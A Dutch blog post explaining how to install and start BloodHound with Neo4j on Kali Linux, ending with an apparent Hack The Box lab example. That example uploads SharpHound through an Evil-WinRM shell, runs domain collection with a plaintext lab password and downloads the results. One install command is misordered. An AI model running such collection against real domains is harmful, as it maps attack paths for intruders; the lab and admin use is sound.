Bloodhound

Intro

Ik heb de afgelopen maanden een paar mensen gehad die me vroegen hoe ik Bloodhound aan de praat kon krijgen nadat ik haar aanbevolen heb sinds ik de video “Six Degrees to Domain Admin” zag van BSIDES Las Vegas. Als je de video waarnaar ik verwijs nog steeds niet heb gezien, stel ik voor dat je een kijkje neemt voordat je doorgaat.

Het is echt zo’n geweldig hulpmiddel en ik raad het ten zeerste aan niet alleen info-sec professionals, maar aan iedereen die een Active Directory-omgeving beheert.

Het geweldige nieuws is dat Bloodhound zich nu in de Kali Linux-repository bevindt  en super gemakkelijk is te installeren is ,ik zal je laten zien hoe.

Zorg voor een up-to-date systeem.

Zorg er ten eerste voor dat u de nieuwste en beste gebruikt door een dist-upgrade zoals deze uit te voeren.

  apt-get update

en toen

  apt-get dist-upgrade

Bloodhound installeren

Je raadt het al, voer gewoon het volgende uit. Bloedhond is afhankelijk van neo4j, dus dat wordt ook geïnstalleerd.

  apt-get bloodhound install

Wijzig het standaardwachtwoord voor Neo4j

We moeten echt het standaardwachtwoord voor Neo4j wijzigen, weet je … Om redenen.

Laten we Neo4j lanceren

  neo4j-console

We hebben nu een externe interface beschikbaar op http: // localhost: 7474 . Laten we daarheen gaan via een browser en dat standaardwachtwoord wijzigen. Je zult ook zien dat het Bolt op de localhost heeft ingeschakeld, we hebben dit nodig voor later.

Log in met de standaardreferenties (hieronder) en u wordt vervolgens gevraagd om het wachtwoord te wijzigen: –

  • Gebruikersnaam: neo4j
  • Wachtwoord: neo4j

Ga je gang en voltooi de wachtwoordwijziging en sluit het browservenster.

Laat de hond het bloed zien

Open een nieuw terminalvenster en voer het volgende commando uit om Bloodhound te starten, laat de Neo4j-console draaien om voor de hand liggende redenen.

  bloodhound

Zoals u kunt zien, is Bloodhound nu actief en wacht het op gebruikersinvoer. Eerder bij het lanceren van Neo4j werd ook Bolt on bolt ingeschakeld: //127.0.0.1: 7687. U moet dit gebruiken als uw database-URL.

  • Database-URL – http: //127.0.0.1: 7687
  • Gebruikersnaam – neo4j
  • Wachtwoord – uw nieuw gewijzigde wachtwoord

Druk op login en je zou de Bloodhound-tool moeten zien, minus alle gegevens. U kunt nu uw gegevens importeren en analyseren.

Hopelijk was dit een leuke en snelle gids om iedereen te helpen die problemen had om aan de slag te gaan met de geweldige tool die Bloodhound is.

Ik wil ook even de tijd nemen om @ _wald0 , @CptJesus en @ harmj0y te bedanken voor hun voortdurende harde werk aan dit geweldige project.

Gezondheid mannen!

Nog even een voorbeeld :

data verkrijgen:
upload SharpHound.ps1

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload /root/htb/SharpHound.ps1 C:\Users\svc-alfresco\Documents
Info: Uploading /root/htb/SharpHound.ps1 to C:\Users\svc-alfresco\Documents

Data: 1226060 bytes of 1226060 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Import-module .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Invoke-BloodHound -CollectionMethod all -Domain htb.local -LdapUser svc-alfresco -LdapPass s3rvice

nadat dit gedaan te hebben, hebben we een zip. Deze kunnen we downloaden met evil-winrm

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download C:\Users\svc-alfresco\Documents\20200102015742_BloodHound.zip /root/htb/puckiestyle.zip
Info: Downloading C:\Users\svc-alfresco\Documents\20200102015742_BloodHound.zip to /root/htb/puckiestyle.zip

Info: Download successful!

En het vervolgens importeren in bloodhound

Gebruikte bestanden : https://github.com/puckiestyle/powershell/blob/master/SharpHound.ps1

Auteur: Jacco Straathof